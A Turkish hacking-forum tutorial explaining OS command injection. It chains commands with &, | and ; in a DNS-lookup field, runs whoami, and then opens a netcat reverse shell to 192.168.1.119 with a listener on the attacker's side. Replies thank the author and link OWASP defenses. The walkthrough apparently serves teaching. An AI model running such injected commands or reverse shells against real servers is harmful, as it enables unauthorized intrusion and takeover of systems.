Os Command Injection

The Gölge

Katılımcı Üye
Herkese selam dostlar bugün Os Command Injection'ı anlatıcağım.İlgisi olanlar için yararlı olması dileğiyle.


Os Command Injection; saldırganın, zafiyetli uygulamayı çalıştıran sunucuda keyfi şekilde işletim sistemi (OS) komutları yürütmesine, genellikle uygulamanın ve tüm verilerin tamamen tehlikeye girmesine izin veren bir web güvenlik açığıdır. Uygulamaların, sistem komutlarını yürütmek için system () veya exec () gibi kabuk fonksiyonlarını çağırırken kullandıkları parametreleri düzgün bir şekilde doğrulayamadığı ve sanitize edemediği durumlarda ortaya çıkar.


11zkvj.PNG



Sayfa da DNS Lookup sorgusu çalıştığını görüyoruz. Demek ki sistemde bir komut çalışıyor ve bunun sonucunu bize yansıtıyor. Linux da bir den fazla komut çalıştırmamızı sağlayan bazı karakterler var.


Bunlar:
Kod:
&    |    ;


Bu karakterleri kullanarak sistemde birden fazla komut çalıştırabiliyoruz.


Not:
Kod:
 | Bu karakterin diğerlerinden farkı bu karakter önceki komutu atlayıp ikinci komuta geçiyor.


fi8fvo.PNG



4fsg42.PNG



8c8y1l.PNG



Şimdi ise bu öğrendiğimiz karakterlerden biri ile sitede kod çalıştırmayı deneyelim bakalım bakalım başarabilecek miyiz.


r36ram.PNG



Gördüğünüz üzere sistemde whoami komutunu yani sistemde kim olduğumuzu gösteren komutu çalıştırmayı başardık.Şimdi ise nc aracı ile basit bir shell ile sisteme girmeyi deneyelim.

Sitede:
Kod:
nc 192.168.1.119 1234 -e /bin/bash


Terminalde:
Kod:
nc -nvlp 1234


Nc aracı ile sitede yaptığımız komut 1234 portu üzerinden bağlantı isteği göndermek ve terminal de yazdığımız komut ile bunu dinlemeye alarak bağlantıyı sağlamak.


lrgrmx.PNG



4c5ns4.PNG



Evet dostlar gördüğünüz üzere sisteme bağlanmış olduk şimdi terminalden komut çalıştırmayı deneyelim.


kvtu6s.PNG



Evet gördüğünüz üzere dostlar sistemde komut çalıştırmayı başardık.
Os Command Injection konum bu kadardı dostlar elimden geldiğince açıklayıcı ve örnekli bir şekilde anlatmaya çalıştım okudunuz için teşekkür ederim.Herkese Hayırlı Günler Dilerim.
 

whatamnotsaying

Katılımcı Üye
29 Mar 2020
408
5
Son düzenleme:

The Gölge

Katılımcı Üye
Eline, Aklina saglik :)
Teşekkür ederim hocam. :)
Bu açıktan PHP'de korunabilmek için escapeshellcmd veya escapeshellarg kullanabilirsiniz.

https://stackoverflow.com/a/19552479

Detaylı Bilgi:

https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
https://owasp.org/www-community/attacks/Command_Injection

Konu sahibine teşekkür ediyorum bu açığa dikkat çektiği için çünkü genelde bu açık pek konuşulmaz.
Teşekkür ederim dostum bizi savunma tarafında bilgilendirdiğin için. Rica ederim açığın ciddi zararlar verebilme potansiyeli olduğu için ve forumda konusuna rastlamadığım için açmak istedim.Güzel yorumun için ayrıca teşekkür ederim.
Eline Sağlık güzel konu olmuş
Teşekkür ederim hocam. :)
Teşekkür ederim hocam. :)
Güzel ve anlayışlı olmuş ellerine sağlık
Teşekkür ederim can dostum.
Eline, emeğine sağlık
Teşekkür ederim dostum.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.